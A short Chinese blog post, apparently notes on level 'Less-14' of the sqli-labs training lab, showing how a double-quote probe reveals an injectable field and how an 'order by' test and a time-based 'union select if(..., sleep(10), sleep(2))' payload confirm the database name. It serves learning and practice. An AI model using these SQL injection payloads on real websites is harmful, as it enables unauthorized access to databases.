Less-14【报错注入】

利用双引号测试报错成功,查看报错信息
在利用双引号进一步测试
123" order by 3 #
查看具体列内容时,发现网页未回显,所以需要配合时间注入进行测试
123" union select if((database()='security'),sleep(10),sleep(2)),null #
 
posted @ 2020-10-30 09:53  峰中追风  阅读(113)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路